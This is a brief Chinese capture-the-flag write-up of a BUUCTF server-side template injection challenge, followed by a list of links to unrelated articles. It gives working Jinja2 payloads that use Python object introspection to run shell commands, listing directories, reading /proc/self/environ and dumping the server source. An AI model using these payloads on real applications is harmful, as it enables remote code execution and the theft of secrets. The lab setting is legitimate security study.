Buuctf [第三章 web进阶]SSTI 20
本文共 881 字,大约阅读时间需要 2 分钟。
- 进入页面用arjun扫描一下有什么url参数
- 这道题是最基础的了
- 直接给payload前面的payload吧
{ { ''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} - 页面返回:password is wrong: app bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
- 我尝试了读取当前运行环境
{ { ''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("cat /proc/self/environ").read()')}} 
- 里面有个假的flag,真让人讨厌呀!
- 读取前面app文件夹
{ { ''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls /app").read()')}} - 返回:Dockerfile docker-compose.yml entrypoint.sh server.py
- 读取server.py源码
{ { ''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("cat /app/server.py").read()')}} - 得到flag~~~~
转载地址:http://ifwmf.baihongyu.com/
你可能感兴趣的文章
深入理解 Linux Cgroup 系列(二):玩转 CPU
查看>>
云原生周报第 1 期 | 2019-06-24~2019-06-28
查看>>
Kubernetes Pod 驱逐详解
查看>>
kubectl 创建 Pod 背后到底发生了什么?
查看>>
[译] Kubernetes 儿童插图指南
查看>>
云原生周报第 2 期 | 2019-07-01~2019-07-05
查看>>
kubectl 创建 Pod 背后到底发生了什么?
查看>>
Kube-scheduler 源码分析(二):调度程序启动前逻辑
查看>>
kubernetes 1.15 有哪些让人眼前一亮的新特性?
查看>>
云原生周报:第 3 期
查看>>
深入理解 Linux Cgroup 系列(三):内存
查看>>
7月最新Java微服务资料
查看>>
Linux 指令
查看>>
wi10优化
查看>>
windows console 颜色设置
查看>>
VC unicode下Cstring转char*
查看>>
MFC ListBox使用
查看>>
Linux 使用grep筛选多个条件
查看>>
H264 NALU分析(sps,pps,关键帧,非关键帧)
查看>>
Windows文本加载wscite的使用
查看>>